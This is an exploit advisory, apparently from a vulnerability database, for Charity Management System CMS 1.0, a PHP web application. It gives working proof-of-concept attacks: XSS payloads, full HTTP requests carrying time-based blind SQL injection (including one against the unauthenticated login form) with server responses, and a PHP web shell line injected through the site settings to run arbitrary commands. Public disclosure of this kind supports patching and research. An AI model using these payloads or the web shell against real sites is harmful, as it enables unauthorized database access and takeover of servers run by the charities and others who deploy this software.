Charity Management System CMS 1.0 Multiple Vulnerabilities

2021.08.20
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Charity Management System CMS 1.0 - Multiple Vulnerabilities # Date: 18/08/2021 # Exploit Author: Davide 't0rt3ll1n0' Taraschi # Vendor Homepage: https://www.sourcecodester.com/users/tips23 # Software Link: https://www.sourcecodester.com/php/14908/simple-charity-website-management-system-cms-php-free-source-code.htmlpolice-crime-record-management-system.html # Version: 1.0 # Testeted on: Linux (Ubuntu 20.04) using LAMPP ## Unauthenticated reflected XSS # Vulnerable code in '/search.php' at line 44/45: <?php if($count_all <= 0): ?> <h4 class="text-center">No Article with "<?php echo $_GET['search'] ?>" keyword found.</h4> The content of the 'search' variable is printed on the page without being checked, leading to XSS # PoC Go to 'http://site.com/charity/' and in the search box input "<svg onload=alert(document.domain)>" without the double quotes, and a text box should appear ## Authenticated stored XSS There is a stored XSS in '/charity/admin/maintenance/manage_topic.php' due to a failure to sanitize user input # Poc 1) Login as admin 2) Go to '/maintenance/manage_topic.php' 3) In "description" insert "<svg onload=alert(document.domain)>" without the double quotes 4) Click the "save" below 5) An alert box should appear ## POST Authenticated SQL Injection # Vulnerable code in '/charity/classes/Master.php' at line 67 $del = $this->conn->query("DELETE FROM `topics` where id = '{$id}'"); The $id variable is used without being checked, leading to SQLi # PoC Request: POST /charity/classes/Master.php?f=delete_topic HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 4 Origin: http://localhost DNT: 1 Connection: close Referer: http://localhost/charity/admin/?page=maintenance/topics Cookie: PHPSESSID=de17186191c1cbdeb6e815ea8c21103f Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))foo)-- foo Response after 5 seconds (the sleep has been executed) HTTP/1.1 200 OK Date: Wed, 18 Aug 2021 14:32:13 GMT Server: Apache/2.4.48 (Unix) OpenSSL/1.1.1k PHP/7.4.22 mod_perl/2.0.11 Perl/v5.32.1 X-Powered-By: PHP/7.4.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Content-Length: 20 Connection: close Content-Type: text/html; charset=UTF-8 {"status":"success"} ## GET Authenticated SQL Injection # Vulnerable code in '/charity/admin/maintenance/manage_topic.php' at line 2/3 if(isset($_GET['id']) && $_GET['id'] > 0){ $qry = $conn->query("SELECT * from `topics` where id = '{$_GET['id']}' "); ... } As usual the 'id' variable is passed to the prepared statement without being checked, leading to (another) SQLi # PoC Similar to the previous one (same payload) ## POST Unauthenticated SQL Injection # Vulnerable code in '/charity/classes/Login.php' at line 21 $qry = $this->conn->query("SELECT * from users where username = '$username' and password = md5('$password') "); The 'username' variable is passed without being sanificated, causing a SQLi # PoC Request: POST /charity/classes/Login.php?f=login HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: */* Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 84 Origin: http://localhost DNT: 1 Connection: close Referer: http://localhost/charity/admin/login.php Cookie: PHPSESSID=de17186191c1cbdeb6e815ea8c21103f Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin username=username' AND (SELECT * FROM (SELECT(SLEEP(5)))foo)-- foo&password=password Response after 5 seconds (the sleep has been executed) HTTP/1.1 200 OK Date: Wed, 18 Aug 2021 14:48:18 GMT Server: Apache/2.4.48 (Unix) OpenSSL/1.1.1k PHP/7.4.22 mod_perl/2.0.11 Perl/v5.32.1 X-Powered-By: PHP/7.4.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Content-Length: 164 Connection: close Content-Type: text/html; charset=UTF-8 {"status":"incorrect","last_qry":"SELECT * from users where username = 'username' AND (SELECT * FROM (SELECT(SLEEP(5)))foo)-- foo' and password = md5('password') "} ## PHP Code Injection lead to Authenticated Remote Code Execution (RCE) # Vulnerable code in /charity/classes/SystemSettings.php at line 37 $qry = $this->conn->query("UPDATE system_info set meta_value = '{$value}' where meta_field = '{$key}' "); The 'value' variable will be included in the homepage of the site without being checked, leading to RCE. # PoC 1) Go to /charity/admin/system_info.php and in the "Welcome content" click on "Code View" at the top right. 2) At the bottom of the html code enter the following code: <?php if(isset($_GET['cmd'])) {system($_GET['cmd']);} ?> 3) Click the "update" button 4) Go to the home page and at the end of the url tipe "?cmd=$cmd" without the double quotes and replacing $cmd with the command you want to execute 5) The output should appear in the homepage


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top